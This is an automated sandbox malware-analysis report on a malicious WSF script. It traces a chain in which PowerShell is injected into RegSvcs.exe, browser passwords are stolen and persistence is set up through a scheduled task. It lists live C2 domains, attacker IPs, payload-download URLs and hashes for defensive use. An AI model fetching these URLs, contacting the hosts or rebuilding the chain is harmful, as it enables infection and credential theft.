              Source: Yara match, file source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara match, file source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara match, file source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match, file source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 22.2.RegSvcs.exe.7230000.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 22.2.RegSvcs.exe.3f95168.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 20.2.powershell.exe.13852e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 38.2.powershell.exe.2b31f7adac0.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.1384aa71a78.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.13852e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 30.2.powershell.exe.2d9107309c8.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

              Remote Access Functionality

              Source: Yara match, file source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 22.2.RegSvcs.exe.7230000.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 22.2.RegSvcs.exe.3f95168.0.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 20.2.powershell.exe.13852e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 38.2.powershell.exe.2b31f7adac0.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.1384aa71a78.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 20.2.powershell.exe.13852e70000.2.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 30.2.powershell.exe.2d9107309c8.1.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, file source: 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, file source: 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ATT&CK matrix, one line per tactic; the number in parentheses is the count the matrix attaches to that technique:

              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
              Resource Development: Scripting (222), Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
              Execution: Windows Management Instrumentation (1), Native API (1), Exploitation for Client Execution (1), Scheduled Task/Job (1), PowerShell (3), Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
              Persistence: Scripting (222), DLL Side-Loading (1), BITS Jobs (1), Scheduled Task/Job (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
              Privilege Escalation: DLL Side-Loading (1), Process Injection (311), Scheduled Task/Job (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
              Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (121), Software Packing (2), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (31), BITS Jobs (1), Process Injection (311)
              Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
              Discovery: File and Directory Discovery (1), System Information Discovery (23), Security Software Discovery (121), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), Remote System Discovery, System Owner/User Discovery, Network Sniffing
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
              Collection: Archive Collected Data (11), Data from Local System (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
              Command and Control: Ingress Tool Transfer (2), Encrypted Channel (1), Non-Standard Port (11), Non-Application Layer Protocol (3), Application Layer Protocol (113), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
              Behavior Graph ID: 1409058, Sample: Summaryform_FXnbLLyKOJ.wsf, Startdate: 14/03/2024, Architecture: WINDOWS, Score: 100

              Process tree recovered from the graph; signatures, dropped files and network contacts are listed under the node they attach to:

              Start
                Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures
                DNS: shefonew07.ddns.net (Uses dynamic DNS services)
                • wscript.exe
                    Network: 212.23.222.200, ports 222, 49699, 49703 (TMRDE, unknown)
                    Dropped: C:\Users\Public84DKJPlEEYLhKqtGW.xml (ASCII)
                    Signatures: System process connects to network (likely due to code injection or exploit); VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Suspicious execution chain found
                    • powershell.exe
                        Dropped: C:\Users\Public\solankedoubledigits.bat (DOS); C:\Users\Public\newrdptry.ps1 (ASCII); C:\Users\Public\nKNmegHQBbmlQMTN.bat (DOS); 2 other malicious files
                        Signatures: Powershell uses Background Intelligent Transfer Service (BITS)
                        • wscript.exe
                            Signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            • cmd.exe
                                Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy
                                • powershell.exe
                                • conhost.exe
                            • net.exe
                                • conhost.exe
                                • net1.exe
                        • conhost.exe
                • wscript.exe
                    • cmd.exe
                        Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
                        • powershell.exe
                            Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
                            • RegSvcs.exe
                                Network: shefonew07.ddns.net, 103.195.101.9, ports 49711, 49712, 49713 (RELIABLESITEUS, Singapore)
                                Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                        • conhost.exe
                    • net.exe
                        • 2 other processes
                • wscript.exe
                    • cmd.exe
                        • 2 other processes
                            • RegSvcs.exe
                    • net.exe
                        • 2 other processes
                • 2 other processes
                    Network: 127.0.0.1 (unknown)
                    • cmd.exe
                        • 2 other processes
                            • RegSvcs.exe
                    • net.exe
                        • 2 other processes

              Source | Detection | Scanner | Label | Link
              Summaryform_FXnbLLyKOJ.wsf | 3% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              http://www.microsoft. | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtX | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtf | 0% | Avira URL Cloud | safe |
              http://www.microsoft.cRooCerA | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/ | 0% | Avira URL Cloud | safe |
              http://212.23.222.200/ | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt= | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtvh | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtLMEM | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt- | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt.h | 0% | Avira URL Cloud | safe |
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtC: | 0% | Avira URL Cloud | safe |
              http://go.microsoft.c% | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
shefonew07.ddns.net | 103.195.101.9 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg | true | Avira URL Cloud: safe | unknown
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.2192080087.0000016D288FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtX | wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.microsoft.cRooCerA | powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtf | wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.2192080087.0000016D29A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DB39D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://212.23.222.200/ | wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://212.23.222.200:222/ | svchost.exe, 00000005.00000002.3363633322.000001B3F889D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000005.00000003.2102025199.000001B3F86C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr | false | | high
http://www.microsoft. | powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtvh | wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt= | wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | edb.log.5.dr | false | | high
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtLMEM | wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt.h | wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtC: | wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt- | wscript.exe, 00000000.00000003.2075147627.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2261063964.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075013439.00000230DEDC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074969549.00000230DEDBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2073866186.00000230DEDC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259363764.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075056628.00000230DEDF2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.microsoft.c% | RegSvcs.exe, 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
103.195.101.9 | shefonew07.ddns.net | Singapore | 23470 | RELIABLESITEUS | true
212.23.222.200 | unknown | unknown | 12329 | TMRDE | true
IP
127.0.0.1
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1409058
                                        Start date and time:2024-03-14 16:34:00 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 11m 22s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:40
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Summaryform_FXnbLLyKOJ.wsf
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winWSF@60/30@1/3
                                        EGA Information:
                                        • Successful, ratio: 33.3%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 268
                                        • Number of non-executed functions: 7
                                        Cookbook Comments:
                                        • Found application associated with file extension: .wsf
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target RegSvcs.exe, PID 3728 because it is empty
                                        • Execution Graph export aborted for target RegSvcs.exe, PID 5040 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 4156 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 5024 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • VT rate limit hit for: Summaryform_FXnbLLyKOJ.wsf
Time | Type | Description
16:34:47 | API Interceptor | 139x Sleep call for process: powershell.exe modified
16:34:49 | API Interceptor | 3x Sleep call for process: svchost.exe modified
16:35:02 | Task Scheduler | Run new task: ChromeUpdateV1 path: C:\Users\Public\NewRdpFirstTry.vbs
16:35:50 | API Interceptor | 5714829x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
212.23.222.200 | Summaryform_TgQFBSAqdC.zip | Get hash | malicious | AsyncRAT, PureLog Stealer | Browse |
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
RELIABLESITEUS | jeNQRsRgBe.exe | Get hash | malicious | Xmrig | Browse | 104.243.33.118
RELIABLESITEUS | 9c5R75OCTH.rtf | Get hash | malicious | Remcos | Browse | 103.195.103.144
RELIABLESITEUS | RdoOvVK8rA.rtf | Get hash | malicious | Remcos | Browse | 103.195.103.144
RELIABLESITEUS | 171033906768c171078005bd5679bcd7a81d40e80cc76f6a0ef5dc60c10b477d48eab4c9d3438.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 103.195.103.144
RELIABLESITEUS | ORDER_SPECIFICATIONS_OFFER.xla.xlsx | Get hash | malicious | Remcos | Browse | 103.195.103.144
RELIABLESITEUS | Product-specifications.xla.xlsx | Get hash | malicious | Remcos | Browse | 103.195.103.144
RELIABLESITEUS | PO4029530.xla.xlsx | Get hash | malicious | Remcos | Browse | 103.195.103.144
RELIABLESITEUS | https://hmyoffice365oth-47f8.guzelkiz66.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse | 104.194.8.143
RELIABLESITEUS | https://fayetteiowa.com/media/media/js/fxzdfsd.html | Get hash | malicious | HTMLPhisher | Browse | 104.194.8.143
RELIABLESITEUS | AWB_008765499.exe | Get hash | malicious | AgentTesla | Browse | 104.194.10.93
TMRDE | Summaryform_TgQFBSAqdC.zip | Get hash | malicious | AsyncRAT, PureLog Stealer | Browse | 212.23.222.200
TMRDE | 2C8CDA2CCC942B4EDA8E1EE37A8F68C557FEE80E14244.exe | Get hash | malicious | Quasar | Browse | 212.23.222.42
TMRDE | Hilix.mips.elf | Get hash | malicious | Mirai | Browse | 185.245.176.189
TMRDE | BiU282bjyR.exe | Get hash | malicious | Remcos | Browse | 212.23.211.238
TMRDE | https://ipfs.io/ipfs/QmdTwDBzfv7vcTnw34YZhB4VroSotz2NY5Hc5FzzQX8qxQ#rramis@isciii.es | Get hash | malicious | HTMLPhisher | Browse | 212.23.144.169
TMRDE | wx7x7YkSI8.elf | Get hash | malicious | Unknown | Browse | 185.249.170.212
TMRDE | 2DLd2J82an.elf | Get hash | malicious | Mirai | Browse | 212.23.154.151
TMRDE | 5vFyCZCGL7.elf | Get hash | malicious | Unknown | Browse | 212.23.212.254
TMRDE | Remittance_ACH_20220630.HTML | Get hash | malicious | Unknown | Browse | 212.23.201.50
TMRDE | JIzNxwvQm7.dll | Get hash | malicious | Wannacry | Browse | 212.23.152.51
No context
No context
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8192
                                          Entropy (8bit):0.35999246155449205
                                          Encrypted:false
                                          SSDEEP:6:6xNoaaD0JOCEfMuaaD0JOCEfMKQmDmxNoaaD0JOCEfMuaaD0JOCEfMKQmD:HaaD0JcaaD0JwQQzaaD0JcaaD0JwQQ
                                          MD5:247B919FE91944A8F0F42F4D079F6E1E
                                          SHA1:697E2C22AC489E20FC5D3809A5552CC2DB30C0C1
                                          SHA-256:57D0A4F0C75E0516F650A83A1C4CA590CEF68985B639B48F8924487287088387
                                          SHA-512:C1FB72FDBBDFBAF9D487B2E9069BCD20286588EA21B6118CB6076C7B3F826F46D97431463BF1D42C23E30BD6055644FEDE46997162F7349DCA99C8594E1A48C3
                                          Malicious:false
                                          Preview:*.>...........p.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................p.............................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.7522399913515765
                                          Encrypted:false
                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0v:9JZj5MiKNnNhoxuU
                                          MD5:31182EA8661656FBC070E62F2C8F59D4
                                          SHA1:9318229C16D25E880158C0AF2C69C1DDE2CB728C
                                          SHA-256:8C003FA06B286E88640B409F1B6CA4F3A27F3ABAAED77DB32D82AE88DD1EBA9F
                                          SHA-512:65209416C6C17250A6FCFC678D8CFE18EED3AD0BB984A7449EB4A4C2E55468EC13C39AECC1E7956D5886358F413021770D7D7C7E99048DCEE1A5751BFA5B16A0
                                          Malicious:false
                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0xeb5681b6, page size 16384, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.629302318267076
                                          Encrypted:false
                                          SSDEEP:1536:1SB2ESB2SSjlK/3xH03N9J9N8sYkr3g16b2UPkLk+kDWyrufTRryrCOLUzCJ:1azal6BiU2UdmOOOL
                                          MD5:9791D3CCA91C7DDB4EF181C358D5697A
                                          SHA1:7D08B783B490284F222C87BEDE3CF0AC27AD5F1D
                                          SHA-256:67EC392483C649829FA9B753987BC25A9274AB1DBCA7DF87FDE8D7005E245287
                                          SHA-512:301C6ABDE60B767FFA96560445DF32025FC575C5A7222AC60B8B4A30538DD1D39637A562A021BB29E08047C0AE0C5550E5C24203BDA043AFEBD85A00018B3C75
                                          Malicious:false
                                          Preview:.V..... .......g.......X\...;...{......................0.o......%...|..1"...|a.h.g......%...|..0.o.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................j..%...|..................d.=..%...|...........................#......0.o.....................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):0.07958383486632692
                                          Encrypted:false
